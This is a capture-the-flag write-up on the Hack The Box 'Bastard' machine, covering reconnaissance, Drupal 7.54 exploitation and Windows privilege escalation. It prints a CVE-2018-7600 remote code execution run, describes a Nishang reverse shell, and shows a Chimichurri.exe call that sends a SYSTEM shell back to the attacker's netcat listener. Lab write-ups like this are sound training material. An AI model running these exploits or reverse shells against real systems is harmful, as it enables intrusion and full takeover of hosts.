Hack the Box Bastard

Arcy Caparros
7 min read · Jun 3, 2020


My write-up on HTB’s retired machine “Bastard” that outlines manual exploitation.

Disclaimer
This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.

Reconnaissance

Starting with Nmap to determine open ports and services. Note that --script vuln runs the intrusive vuln-category scripts; the http-csrf entries below only list forms for which the script found no anti-CSRF token, so the useful result is simply IIS 7.5 on tcp/80 plus two RPC ports.

nmap -sC -sV --script vuln 10.10.10.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 10:52 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.9
Host is up (0.025s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.9
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.9:80/
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://10.10.10.9:80/user/password
| Form id: user-pass
| Form action: /user/password
|
| Path: http://10.10.10.9:80/node?destination=node
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://10.10.10.9:80/user/register
| Form id: user-register-form
| Form action: /user/register
|
| Path: http://10.10.10.9:80/user/
| Form id: user-login
| Form action: /user/
|
| Path: http://10.10.10.9:80/user
| Form id: user-login
|_ Form action: /user
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /rss.xml: RSS or Atom feed
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect result

Enumeration

Further enumeration of tcp/80 identifies the web application as Drupal 7.54 (the same version string shows up later in the web root path C:\inetpub\drupal-7.54).

Searchsploit was used to identify possible public exploits for Drupal 7.54.

I tried several of them, including 41564.php (the Drupal 7 Services module REST RCE), but ran into problems replaying the cookies and session ID it relies on. Further research led me to https://github.com/pimps/CVE-2018-7600. The Python script did not need any editing and did the trick:

root@cainta:~/Documents/htb/Bastard/CVE-2018-7600# python3 drupa7-CVE-2018-7600.py -c "whoami" http://10.10.10.9
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-LOvQkOzsRz5QCAjBT2OrPr35lTi4nH8oXpYP1Bg4kNI
[*] Triggering exploit to execute: whoami
nt authority\iusr

The command ran as nt authority\iusr, the IIS anonymous account, so the next step is to load a PowerShell script and see whether we can get a reverse shell. I used Nishang's Invoke-PowerShellTcp.ps1 and caught the reverse shell on port 4444.

The command used (shown as an image in the original post) combines pimps' CVE-2018-7600 script with Invoke-PowerShellTcp.ps1: the exploit's -c argument carries a PowerShell command that loads the Nishang script and connects back to the listener on port 4444.

Initial Foothold

Initial foothold obtained as nt authority\iusr, and we have access to the user.txt file.

User.txt

Privilege Escalation

To work out how we can elevate our privileges from the IIS anonymous account, we first need a way to identify local vulnerabilities, and that starts with the OS version and patch level.

System Information

PS C:\temp> systeminfo

Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46
System Boot Time: 31/5/2020, 11:06:40
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.487 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.481 MB
Virtual Memory: In Use: 614 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9

Build 7600 with "Hotfix(s): N/A" is Server 2008 R2 at RTM level with nothing installed on top, which already says a lot. I tried different Windows exploit suggester tools by transferring them to the victim machine, but they either would not execute or simply hung. So I saved the system information and transferred systeminfo.txt to my Kali machine, using an Impacket SMB share for file transfer in both directions (there is no wget or curl on the target; the same share is used below to bring Sherlock.ps1 across).

Set up the SMB server:

root@cainta:~/Documents/htb/Bastard# impacket-smbserver bugok /root/Documents/htb/Bastard/
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.9,49252)
[*] AUTHENTICATE_MESSAGE (\,BASTARD)
[*] User BASTARD\ authenticated successfully
[*] :::00::4141414141414141
[-] Unknown level for query path info! 0x109

From Bastard, copy the file:

PS C:\temp> copy //10.10.14.37/bugok/Sherlock.ps1 Sherlock.ps1
PS C:\temp> ls

    Directory: C:\temp

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---        28/5/2020   4:48         16663 Sherlock.ps1

PS C:\temp>

Now run ‘Sherlock.ps1’

PS C:\temp> powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"

Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable
Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Not Vulnerable
Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Not Vulnerable
Title : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
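
The triage step that the write-up hands to an exploit suggester, as an added example (not the write-up's own tooling, and not windows-exploit-suggester or Sherlock): parse a saved systeminfo dump and check the build, architecture and installed hotfixes against a rule table. The sample input is the systeminfo output captured on this page, abridged; the rule table is constructed for this example, with KB numbers and build ranges that are my own assumptions standing in for a suggester's database. MS10-059 is in the table because it is the bulletin Chimichurri exploits and it is absent from Sherlock's checks above, which is why a clean Sherlock run on a 2010-era build still leaves room.

```python
"""Offline patch-level triage of a systeminfo dump (added example)."""
import re

# Sample input: the systeminfo output captured on this page, abridged.
SAMPLE_SYSTEMINFO = """\
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
OS Configuration:          Standalone Server
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Constructed rule table (assumed values, a stand-in for a suggester's database):
# bulletin -> KB that fixes it on Windows 6.1, affected kernel builds, and the
# architectures the public exploit supports (KiTrap0D is 32-bit only).
RULES = {
    "MS10-015": {"kb": "KB977165",  "builds": {"6.1.7600", "6.1.7601"}, "arch": {"x86"},        "name": "KiTrap0D"},
    "MS10-059": {"kb": "KB982799",  "builds": {"6.1.7600", "6.1.7601"}, "arch": {"x86", "x64"}, "name": "Tracing feature ACL (Chimichurri)"},
    "MS15-051": {"kb": "KB3045171", "builds": {"6.1.7600", "6.1.7601"}, "arch": {"x86", "x64"}, "name": "ClientCopyImage win32k"},
    "MS16-032": {"kb": "KB3143141", "builds": {"6.1.7600", "6.1.7601"}, "arch": {"x86", "x64"}, "name": "Secondary Logon handle"},
}

FIELD_RE = re.compile(r"^([^:\s][^:]*?):\s*(.*)$")   # "Key:   value"
ITEM_RE = re.compile(r"^\s*\[\d+\]:\s*(.*)$")        # "   [01]: item" continuation lines


def parse_systeminfo(text):
    """Return a dict of systeminfo fields plus a 'hotfixes' list of KB ids.

    Continuation lines ("[01]: ...") belong to the last field seen; only the
    ones under Hotfix(s) matter here.  "Hotfix(s): N/A" yields an empty list,
    which is exactly the case on this box.
    """
    info = {"hotfixes": []}
    current = None
    for line in text.splitlines():
        item = ITEM_RE.match(line)
        if item:
            if current == "Hotfix(s)":
                kb = re.search(r"KB\d+", item.group(1))
                if kb:
                    info["hotfixes"].append(kb.group(0))
            continue
        field = FIELD_RE.match(line)
        if field:
            current = field.group(1).strip()
            info[current] = field.group(2).strip()
    return info


def kernel_build(info):
    """'6.1.7600 N/A Build 7600' -> '6.1.7600'."""
    match = re.search(r"\d+\.\d+\.\d+", info.get("OS Version", ""))
    return match.group(0) if match else None


def architecture(info):
    return "x64" if "x64" in info.get("System Type", "") else "x86"


def missing_patches(info):
    """Bulletins whose fixing KB is absent for this build and whose public
    exploit supports this architecture, in table order."""
    build, arch = kernel_build(info), architecture(info)
    installed = set(info["hotfixes"])
    return [bulletin for bulletin, rule in RULES.items()
            if build in rule["builds"] and arch in rule["arch"]
            and rule["kb"] not in installed]


if __name__ == "__main__":
    host = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(host["Host Name"], kernel_build(host), architecture(host),
          "hotfixes:", host["hotfixes"] or "none")
    for bulletin in missing_patches(host):
        print(bulletin, RULES[bulletin]["name"], RULES[bulletin]["kb"], "not installed")
```

Run against a real dump with `parse_systeminfo(open("systeminfo.txt", encoding="utf-16").read())` when the file was redirected on the Windows side; a missing KB means "not known to be patched", not "exploitable", so the output is a candidate list to try in the order of least collateral risk, not a verdict.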

I tried several of the local exploits flagged above but could not get them to load. Further research led me to Chimichurri.exe (https://github.com/Re4son/Chimichurri).

Root Flag Obtained

Chimichurri is the public exploit for MS10-059 (the Windows Tracing feature for Services registry ACL bug), a 2010 bulletin that Sherlock does not check for; on a build 7600 host with no hotfixes installed it is a natural candidate. The binary expects the listener IP and port as two separate arguments: the first attempt below passed them as a single quoted string, so it only printed its usage line.

PS C:\inetpub\drupal-7.54> ./Chimichurri.exe "10.10.14.37 9999"
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
PS C:\inetpub\drupal-7.54> ./Chimichurri.exe 10.10.14.37 9999

Netcat window:

root@cainta:~/Documents/htb/Bastard# nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.10.14.37] from (UNKNOWN) [10.10.10.9] 49315
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

C:\inetpub\drupal-7.54>cd c:\Users\Administrator\Desktop

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of c:\Users\Administrator\Desktop

19/03/2017  08:33    <DIR>          .
19/03/2017  08:33    <DIR>          ..
19/03/2017  08:34                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  30.807.576.576 bytes free

c:\Users\Administrator\Desktop>

Lessons Learned

  • Understand how a publicly available exploit works before running it. Every system behaves differently, and you may need to adapt or recompile the exploit for the target host (here, the 64-bit build ruled out several of Sherlock's suggestions outright).
  • Learn alternative ways to move or download files to the victim host when wget or curl are not available, such as copying from an SMB share you control.
  • Understand how to execute commands from a restricted PowerShell session (-exec bypass, Import-Module from a local path).
